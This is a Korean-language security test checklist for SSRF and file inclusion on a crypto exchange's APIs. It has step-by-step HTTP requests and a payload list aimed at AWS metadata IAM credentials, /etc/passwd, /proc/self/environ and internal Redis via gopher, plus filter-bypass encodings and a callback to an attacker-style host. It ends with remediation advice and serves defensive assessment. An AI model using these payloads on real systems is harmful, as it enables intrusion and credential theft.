================================================================================
[VCE-EX-04] SSRF/File Inclusion 공격 가능성
도메인: exchange
================================================================================

1. 진단 항목 개요
   - 항목명   : SSRF(Server-Side Request Forgery) 및 File Inclusion 공격 가능성
   - 번호     : VCE-EX-04
   - 위험도   : High
   - 설명     : VCE 거래소 서버가 외부 URL 참조 기능(신분증 업로드, 외부 데이터 fetch 등)을
                처리할 때, 공격자가 제공한 내부 서버 URL로 요청을 유도하는 SSRF 공격
                가능성을 검증한다. 성공 시 AWS EC2 메타데이터 서버(169.254.169.254) 접근,
                내부 서비스 포트 스캔, 방화벽 우회를 통한 내부망 접근이 가능하다.
                File Inclusion은 서버 측 파일 처리 로직에서 경로 조작을 통해 임의 파일을
                포함시키는 공격이다.

--------------------------------------------------------------------------------

2. 대상 기능 & 엔드포인트
   - 기능 설명  : 신분증 업로드, 외부 이미지/데이터 참조, 프로필 이미지 URL 등 서버가
                  외부 리소스를 fetch하는 모든 기능이 대상이다.

   [신분증 업로드 (URL 기반 참조 가능성)]
   - 로컬  : http://localhost:8080/api/auth/me/id-photo
   - 운영  : https://vceapp.com/api/auth/me/id-photo
   - 메서드: POST (multipart/form-data)
   - 인증  : JWT Bearer Token 필요

   [외부 시세 데이터 fetch (있는 경우)]
   - 로컬  : http://localhost:8080/api/market/external?url=
   - 운영  : https://vceapp.com/api/market/external?url=
   - 메서드: GET
   - 인증  : 불명

   [프로필/아바타 URL 설정 (있는 경우)]
   - 로컬  : http://localhost:8080/api/auth/me/avatar
   - 운영  : https://vceapp.com/api/auth/me/avatar
   - 메서드: POST
   - 인증  : JWT Bearer Token 필요

   [Webhook 또는 콜백 URL 설정]
   - 로컬  : http://localhost:8080/api/settings/webhook
   - 운영  : https://vceapp.com/api/settings/webhook
   - 메서드: POST
   - 인증  : JWT Bearer Token 필요

--------------------------------------------------------------------------------

3. 취약점 원리 (Why this works)

   [SSRF 기본 원리]
   SSRF(Server-Side Request Forgery)는 공격자가 서버를 대리인으로 활용하여 공격자가
   직접 접근할 수 없는 내부 서비스에 요청을 보내는 공격이다. 애플리케이션이 사용자로부터
   URL을 입력받아 서버 측에서 해당 URL로 HTTP 요청을 보내는 경우, 공격자는 내부 IP
   주소(localhost, 10.x.x.x, 172.16.x.x, 192.168.x.x, 169.254.169.254)를 입력하여
   내부 서비스에 접근할 수 있다.

   [AWS 클라우드 환경에서의 SSRF 위험성]
   VCE가 AWS EC2에서 운영되는 경우, SSRF 취약점은 특히 위험하다. AWS EC2 인스턴스 메타데이터
   서비스(IMDS)는 169.254.169.254 IP에서 접근 가능하며, 인스턴스의 IAM 역할 임시 자격증명
   (Access Key, Secret Key, Session Token)을 반환한다. 공격자는 이 자격증명으로 AWS
   S3 버킷, RDS 데이터베이스 등 클라우드 인프라 전체를 제어할 수 있다.

   [File Inclusion 원리]
   서버가 URL 또는 파일 경로를 입력받아 해당 파일을 처리하는 경우, file:// 프로토콜을
   사용하거나 경로 탐색 문자(../)를 삽입하여 서버 로컬 파일에 접근할 수 있다.
   Java의 URL 클래스는 file:// 프로토콜을 기본적으로 지원하므로, 검증 없이 URL을
   처리하면 /etc/passwd, /proc/self/environ, application.properties 등 민감한 파일이
   노출될 수 있다.

   [DNS Rebinding 우회]
   서버가 도메인으로 내부 IP를 차단하더라도 DNS Rebinding 기법으로 우회할 수 있다.
   외부에서 접근 가능한 도메인이 처음에는 외부 IP를 반환했다가, TTL 만료 후 내부 IP
   (127.0.0.1)를 반환하도록 조작하여 서버가 내부 서비스에 요청하도록 유도한다.
   tools.rebind.network 등의 서비스를 활용하여 테스트할 수 있다.

   [공격 성립 조건]
   - 애플리케이션이 사용자 제공 URL로 서버 측에서 HTTP 요청을 수행
   - URL에 대한 도메인/IP 허용목록(allowlist) 검증 없음
   - file://, dict://, gopher://, ftp:// 등 위험 프로토콜 미차단
   - 내부 네트워크와 서버가 동일한 네트워크 세그먼트에 위치

--------------------------------------------------------------------------------

4. 테스트 절차 (Step-by-step)

   [사전 준비]
   - Burp Suite 실행 및 Burp Collaborator 클라이언트 준비
   - test@vce.com / test1234로 로그인하여 JWT 토큰 획득
   - Burp Collaborator URL 생성: xxxxxxxx.burpcollaborator.net
   - 내부 IP 목록 준비: 127.0.0.1, localhost, 169.254.169.254, 10.0.0.1, 192.168.1.1
   - ngrok 또는 공격자 제어 서버 준비 (외부 DNS 확인용)

   ---[ STEP 1: 기본 SSRF 탐지 - 외부 Burp Collaborator로 DNS 요청 확인 ]---
   서버가 외부 URL로 요청을 보내는지 확인:

   --- HTTP 요청 예시 ---
   POST /api/auth/me/id-photo HTTP/1.1
   Host: localhost:8080
   Content-Type: multipart/form-data; boundary=----Boundary
   Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...

   ------Boundary
   Content-Disposition: form-data; name="imageUrl"

   http://attacker-burpcollaborator.net/ssrf-test
   ------Boundary--
   ---
   판단: Burp Collaborator에서 DNS 조회 또는 HTTP 요청 수신 시 SSRF 취약

   ---[ STEP 2: localhost 내부 서비스 접근 ]---

   --- HTTP 요청 예시 (localhost 접근) ---
   POST /api/auth/me/id-photo HTTP/1.1
   Host: localhost:8080
   Content-Type: application/json
   Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...

   {
     "imageUrl": "http://localhost:8080/actuator/env"
   }
   ---

   --- HTTP 요청 예시 (내부 서비스 포트 스캔) ---
   {
     "imageUrl": "http://127.0.0.1:3306"
   }
   ---
   응답 시간 차이로 내부 포트 열림 여부 추측:
   - 포트 열림: 빠른 응답 또는 연결 거부 오류
   - 포트 닫힘: 느린 응답 (타임아웃) 또는 "connection refused"

   ---[ STEP 3: AWS 메타데이터 서버 접근 시도 ]---

   --- HTTP 요청 예시 ---
   POST /api/auth/me/id-photo HTTP/1.1
   Host: localhost:8080
   Content-Type: application/json
   Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...

   {
     "imageUrl": "http://169.254.169.254/latest/meta-data/"
   }
   ---

   --- HTTP 요청 예시 (IAM 자격증명 탈취 시도) ---
   {
     "imageUrl": "http://169.254.169.254/latest/meta-data/iam/security-credentials/"
   }
   ---

   --- HTTP 요청 예시 (IMDSv2 우회 시도) ---
   PUT /api/auth/me/id-photo HTTP/1.1
   Host: localhost:8080
   Content-Type: application/json
   Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...
   X-aws-ec2-metadata-token-ttl-seconds: 21600

   {
     "imageUrl": "http://169.254.169.254/latest/meta-data/iam/security-credentials/ec2-role"
   }
   ---

   ---[ STEP 4: file:// 프로토콜 삽입 (Local File Inclusion) ]---

   --- HTTP 요청 예시 ---
   POST /api/auth/me/id-photo HTTP/1.1
   Host: localhost:8080
   Content-Type: application/json
   Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...

   {
     "imageUrl": "file:///etc/passwd"
   }
   ---

   --- HTTP 요청 예시 (Windows 경로) ---
   {
     "imageUrl": "file:///C:/Windows/System32/drivers/etc/hosts"
   }
   ---

   --- HTTP 요청 예시 (Spring 설정 파일 탈취) ---
   {
     "imageUrl": "file:///app/resources/application.properties"
   }
   ---

   --- HTTP 요청 예시 (/proc 파일 시스템 접근) ---
   {
     "imageUrl": "file:///proc/self/environ"
   }
   ---

   ---[ STEP 5: 프로토콜 우회 시도 ]---
   URL 필터링 우회를 위한 다양한 프로토콜 시도:

   --- HTTP 요청 예시 ---
   {
     "imageUrl": "dict://localhost:6379/info"
   }
   ---

   --- HTTP 요청 예시 (gopher 프로토콜 - Redis 명령 전송) ---
   {
     "imageUrl": "gopher://localhost:6379/_*1%0d%0a$4%0d%0ainfo%0d%0a"
   }
   ---

   ---[ STEP 6: IP 우회 인코딩 기법 ]---
   localhost/127.0.0.1 필터링 우회:

   --- HTTP 요청 예시 ---
   {
     "imageUrl": "http://0x7f000001/"
   }
   ---
   (0x7f000001 = 127.0.0.1 16진수 표현)

   {
     "imageUrl": "http://2130706433/"
   }
   (2130706433 = 127.0.0.1 10진수 표현)

   {
     "imageUrl": "http://127.1/"
   }

   {
     "imageUrl": "http://[::1]/"
   }
   (IPv6 루프백)

   {
     "imageUrl": "http://127.0.0.1.nip.io/"
   }
   (DNS 기반 우회)

   ---[ STEP 7: URL 파라미터 기반 SSRF 탐지 ]---
   URL 파라미터에 외부 URL이 포함되는 GET 엔드포인트 탐색:

   --- HTTP 요청 예시 ---
   GET /api/market/price?source=http://169.254.169.254/latest/meta-data/ HTTP/1.1
   Host: localhost:8080
   Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...
   ---

   SSRF 페이로드 목록:
   [내부 IP]
   1. http://127.0.0.1/
   2. http://localhost/
   3. http://0.0.0.0/
   4. http://169.254.169.254/latest/meta-data/
   5. http://192.168.1.1/
   6. http://10.0.0.1/
   7. http://172.16.0.1/

   [file:// 프로토콜]
   8.  file:///etc/passwd
   9.  file:///etc/hosts
   10. file:///proc/self/environ
   11. file:///app/application.properties

   [IP 인코딩 우회]
   12. http://0x7f000001/
   13. http://2130706433/
   14. http://127.1/
   15. http://[::1]/

   [포트 스캔]
   16. http://localhost:22/ (SSH)
   17. http://localhost:3306/ (MySQL)
   18. http://localhost:6379/ (Redis)
   19. http://localhost:5432/ (PostgreSQL)
   20. http://localhost:8080/actuator/

--------------------------------------------------------------------------------

5. 취약 여부 판단 기준

   ✅ 취약 (Vulnerable):
      - Burp Collaborator에 DNS 조회 또는 HTTP 요청이 수신됨 (기본 SSRF 확인)
      - http://169.254.169.254/latest/meta-data/ 요청 시 AWS 메타데이터가 응답에 포함됨
      - file:///etc/passwd 요청 시 /etc/passwd 파일 내용이 응답에 포함됨
      - localhost 내부 서비스 응답이 API 응답에 포함되거나 오류 메시지에 노출됨
      - 내부 포트 열림/닫힘에 따라 응답 시간이 유의미하게 다름

   ✗ 안전 (Not Vulnerable):
      - 외부/내부 URL 입력 시 400 Bad Request와 "허용되지 않은 URL" 메시지 반환
      - URL에 대한 도메인 allowlist 검증으로 승인된 도메인 외 차단
      - file://, dict://, gopher:// 등 비HTTP 프로토콜 즉시 거부
      - 169.254.169.254, 127.0.0.1, 10.x.x.x 등 내부 IP 범위 차단

--------------------------------------------------------------------------------

6. 예상 취약 포인트 (코드 위치)

   - FileService.java:42 - 파일 업로드 처리 시 URL 참조 기능이 있을 경우 SSRF 가능
     -> new URL(userInputUrl).openConnection() 형태의 코드

   - KycService.java 또는 VerificationService.java - 신분증 URL 처리 로직
     -> RestTemplate.getForObject(url, ...) 또는 HttpClient.execute(new HttpGet(url))

   - ExternalPriceService.java - 외부 시세 데이터 fetch 시 URL 파라미터 사용 가능성

   - WebhookService.java - 사용자 설정 Webhook URL로 서버가 POST 요청을 전송할 경우

--------------------------------------------------------------------------------

7. 권고 조치

   - [URL allowlist 검증] 서버가 외부 URL로 요청을 보내야 하는 경우, 허용된 도메인 목록을
     서버 측에서 엄격하게 관리한다. URL 파싱 후 hostname을 추출하여 allowlist와 비교하고,
     일치하지 않으면 즉시 거부한다.

   - [내부 IP 차단] DNS 조회 후 반환된 IP 주소가 RFC 1918 사설 IP(10.x.x.x, 172.16-31.x.x,
     192.168.x.x), 루프백(127.x.x.x), 링크-로컬(169.254.x.x) 범위인 경우 요청을
     거부한다. InetAddress로 IP를 확인하여 isSiteLocalAddress(), isLoopbackAddress(),
     isLinkLocalAddress() 메서드로 검증한다.

   - [프로토콜 제한] http:// 및 https:// 프로토콜만 허용하고 file://, dict://, gopher://,
     ftp://, ldap:// 등은 명시적으로 차단한다. URL.getProtocol()로 프로토콜 검증 후
     허용되지 않은 경우 예외를 발생시킨다.

   - [AWS IMDSv2 적용] AWS 환경에서는 IMDSv2(Instance Metadata Service v2)를 강제 적용하여
     SSRF를 통한 메타데이터 접근을 어렵게 한다. IMDSv2는 PUT 요청으로 토큰을 먼저 획득해야
     하므로 단순 SSRF 공격을 차단할 수 있다.
